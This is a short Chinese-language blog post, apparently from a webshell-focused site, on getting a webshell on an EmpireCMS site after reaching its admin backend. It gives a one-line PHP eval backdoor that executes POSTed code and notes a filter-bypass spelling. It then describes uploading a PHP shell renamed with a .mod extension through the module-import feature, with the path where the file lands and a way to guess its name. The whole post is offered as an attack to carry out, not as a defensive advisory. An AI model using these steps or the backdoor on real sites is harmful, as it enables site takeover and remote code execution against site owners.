EmpireCMS(帝国)后台拿shell

分类:安全 | 2011-09-20 | 撸过 108 次
0人扯谈

管理模板

添加自定义页面

<\?php eval($_POST[baidu])?\>

<%这个被过滤了所以必须这样写。

作者:killer

还是几个月前一个朋友让我看看帝国进后台能不能找到简单点拿shell的方法,因为他找的方法虽然达到目的了,但是过程很繁琐.
方法很简单,直接上传webshell..

进入后台—系统设置—管理数据表—管理系统模型—导入新型模块,直接把php的shell改名为shell.php.mod上传即可.
当时本地测试的时候上传会直接报错爆出文件名出来
shell的路径为../e/data/tmp/mod/uploadmxxxxxxx.php
最新版的帝国cms我也没有测试过,如果没有报错的话,可以使用uploadm~num.php来递增数字..

本站内容均为原创,转载请务必保留署名与链接!
EmpireCMS(帝国)后台拿shell:https://www.webshell.cc/1404.html
标签: ,

相关日志